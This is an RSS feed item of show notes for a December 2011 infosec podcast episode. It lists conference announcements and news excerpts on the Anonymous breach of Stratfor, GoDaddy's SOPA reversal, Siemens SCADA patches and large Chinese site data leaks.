		<title>Episode 553 &#8211; Stratfor, MiamiPD,GoDaddy, Siemens, CDSN &amp; Rick’s Top 5</title>
		<link>http://www.isdpodcast.com/episode-553-stratfor-miamipdgodaddy-siemens-cdsn-ricks-top-5</link>
		<comments>http://www.isdpodcast.com/episode-553-stratfor-miamipdgodaddy-siemens-cdsn-ricks-top-5#comments</comments>
		<pubDate>Wed, 28 Dec 2011 01:50:23 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3304</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 553 for December 27, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 553 for December 27, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma.</span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.computerworld.com/s/article/9223025/Confidential_client_list_safe_from_Anonymous_Stratfor_says"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223025/Confidential_client_list_safe_from_Anonymous_Stratfor_says</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Activist hacker group Anonymous has claimed to have stolen thousands of emails, passwords and sensitive credit card details from a US-based security think-tank, forcing it to suspend operations. &nbsp;Promising it was just the start of a week-long Christmas inspired assault on a long list of targets.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Hackers Group said they were obtain the information because the stratfor did not encrypt it. The Austin-based company which provides international affairs and security threats, says the operation has been suspended on its server and email. Stratfor website was not working on Monday .</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The breach doesn&#39;t necessarily pose a risk to owners of the credit cards. A card user who suspects fraudulent activity on his or her card can contact the credit card company to dispute the charge.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor said in an email to members that it had suspended its servers and email after learning that its website had been hacked. Stratfor&#39;s sent an e-mail to subscribers yesterday, confirming the cyberattack .</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We have reason to believe that the names of our corporate subscribers have been posted on other web sites,&quot; said the email, signed by Stratfor Chief Executive George Friedman and passed on to AP by subscribers. &quot;We are diligently investigating the extent to which subscriber information may have been obtained.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Stratfor&#39;s relationship with its members and, in particular, the confidentiality of their subscriber information, are very important to Stratfor and me,&quot; Friedman wrote.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One member of the hacking group, who uses the handle AnonymousAbu on Twitter, claimed that more than 90,000 credit cards from law enforcement, the intelligence community and journalists &ndash; &quot;corporate/exec accounts of people like Fox&quot; News &ndash; had been hacked and used to &quot;steal a million dollars&quot; and make donations.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was impossible to verify where credit card details were used. Fox News was not on the excerpted list of Stratfor members posted online, but other media organisations including MSNBC and Al-Jazeera English appeared in the file.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous warned it has &quot;enough targets lined up to extend the fun fun fun of LulzXmas through the entire next week&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous has previously claimed responsibility for cyber attacks on financial institutions seen as enemies of the whistle-blowing website Wikileaks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The damage from a weekend data breach at a think tank on international security issues appears to have been inflated by the assault&#39;s perpetrators, the hacker collective known as Anonymous.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After Anonymous ransacked think tank Stratfor&#39;s computers and stole away thousands of credit card numbers and other personal information, it claimed to have also clipped the company&#39;s confidential client list. That list contains sensitive information about Stratfor&#39;s high- profile clients, such as Apple, the U.S. Air Force, and the Miami Police Department.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, Stratfor denies that Anonymous got the think tank&#39;s family jewels. &quot;Contrary to this assertion the disclosure was merely a list of some of the members that have purchased our publications and does not comprise a list of individuals or entities that have a relationship with Stratfor beyond their purchase of our subscription-based publications,&quot; the firm says in an e-mail to its members dated December 25.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor adds that it had hired an identity theft and monitoring service to assist its members affected by the data breach. Further details on those services will be released to affected members later this week, it says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Monday morning, </span><a href="http://stratfor.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stratfor&#39;s website</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was offline. Visitors to the location are being greeted to an &quot;undergoing maintenance&quot; screen. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.nbcmiami.com/news/local/Miami-PD-Among-Targets-of-Internet-Activist-Hackers-136243498.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nbcmiami.com/news/local/Miami-PD-Among-Targets-of-Internet-Activist-Hackers-136243498.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Miami Police Department spokesman said he has no idea why they were listed as a target by an activist hacker protest group called &ldquo;Anonymous.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sgt. Freddie Cruz said Miami Police have &quot;not identified any breach&quot; yet. If they do, they will &quot;move swiftly (with the FBI) to investigate and apprehend&quot; them.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meantime, Anonymous shut down the website of a global security firm called &ldquo;Stratfor,&rdquo; claiming to steal its client list and 50,000 credit card numbers &#8212; and then use that data to withdraw money from clients&rsquo; accounts and donate $1 million to charities.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous is loosely knit and decentralized by design, so it does not necessarily speak with one voice, and confirmation is hard to come by.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A vice president for one South Florida cloud-based Internet security firm, Prolexic, warns this kind of activist hacking will continue to expand.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is extremely widespread these days,&rdquo; said Neal Quinn, vice president for operations at Prolexic, which has helped some victims of Anonymous. &ldquo;Activism is something that we see in all corners of the Internet. And it&#39;s very often associated with a viewpoint that many people in the population share. It&rsquo;s definitely not fringe anymore.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Quinn said individuals have little to fear from Anonymous unless they are part of a corporation or institution involved in sensitive political or social issues, as Stratfor is.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><br />
	<a href="http://www.pcmag.com/article2/0,2817,2398038,00.asp?kc=PCRSS05079TX1K0000992"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2398038,00.asp?kc=PCRSS05079TX1K0000992</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GoDaddy on Friday withdrew its support for the controversial Stop Online Piracy Act (SOPA) amidst a backlash from customers who were vehemently against the legislation.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a statement, GoDaddy CEO Warren Adelman said the company will support SOPA &quot;when and if the Internet community supports it.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A previously published, lengthy defense of SOPA now points to GoDaddy&#39;s updated statement, which the company said is intended to &quot;eliminate any confusion.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The move comes after a Reddit user called on those with GoDaddy domains to move them elsewhere by Dec. 29, prompting godaddyboycott.org.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cheezburger CEO Ben Huh quickly pledged to make the move. &quot;We will move our 1,000 domains off @godaddy unless you drop support of SOPA. We love you guys, but #SOPA-is-cancer to the Free Web,&quot; Huh tweeted yesterday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today, Huh tweeted &quot;Congrats Internet. You did it!&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In his statement, GoDaddy&#39;s Adelman said &quot;Fighting online piracy is of the utmost importance, which is why Go Daddy has been working to help craft revisions to this legislation&mdash;but we can clearly do better.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GoDaddy and its general counsel, Christine Jones, worked &quot;for months&quot; to help craft a bill.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Jones has fought to express the concerns of the entire Internet community and to improve the bill by proposing changes to key defined terms, limitations on DNS filtering to ensure the integrity of the Internet, more significant consequences for frivolous claims, and specific provisions to protect free speech,&quot; GoDaddy said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://news.softpedia.com/news/Siemens-Promises-to-Patch-SCADA-Flaws-After-they-Angered-Researcher-243014.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Siemens-Promises-to-Patch-SCADA-Flaws-After-they-Angered-Researcher-243014.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A few days back we saw how security researcher Billy Rios got angry at Siemens after the company claimed that no authorization bypass flaws were present in their SIMATIC systems. Now, Siemens came forward with a statement reporting that they&rsquo;re planning to fix the vulnerabilities next month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rios became upset last week after he&rsquo;d found out from a Reuters reporter that Siemens officially denied knowing of the authentication flaws he had disclosed to them earlier this year. After the scandal broke out, the SCADA components manufacturer released an official comment.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Siemens was notified by IT experts (Billy Rios and Terry McCorke) about vulnerabilities in some of its automation products. These are the WinCC flexible RT versions from 2004 to 2008 SP2 and WinCC Runtime Advanced V11 and multiple Simatic panels (TP, OP, MP, Comfort),&rdquo; the company </span><a href="http://www.industry.siemens.com/topics/global/en/industrial-security/pages/Default.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">said</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We are aware of the reported vulnerabilities, first reported in May 2011. Our development had immediately taken action and addressed these issues. The vulnerabilities will be fixed by security updates, first is planned to be issued in January 2012.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They also state that on December 2011 other vulnerabilities had been reported as well, all of them being currently investigated.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Finally, in an attempt to clean their stained reputation, the industrial giant thanks Rios and Terry McCorke for reporting the vulnerabilities.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This comes after Rios highlighted some major weaknesses in the way SIMATIC systems were protected. He showed the default three character passwords used by the web interface and other serious issues that could allow a hacker to easily take over a component of a company&rsquo;s infrastructure. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.penn-olson.com/2011/12/22/hackers-steal-data-of-millions-of-chinese-net-users/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.penn-olson.com/2011/12/22/hackers-steal-data-of-millions-of-chinese-net-users/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yesterday, the Chinese internet was shaken by the news that IT portal and community CDSN has been hacked and data for its more than six million users had been stolen, including usernames and passwords. Today, reports have it that CDSN wasn&rsquo;t the only site affected.</span><br />
	<a href="http://penn-olson.com/tag/duowan/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Duowan</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a games site, was hacked and hackers stole the data of its over eight million users. 7K7K, also a gaming site, reportedly lost data for 20 million users, and hackers also got info from 10 million accounts by hacking 178.com, another game site. Rumors are spreading that the hacks and leaked data may also have affected major social networking sites like </span><a href="http://penn-olson.com/tag/renren/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Renren</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and </span><a href="http://penn-olson.com/tag/kaixin/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Kaixin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, but those claims appear to be unsubstantiated (at least for now).</span><br />
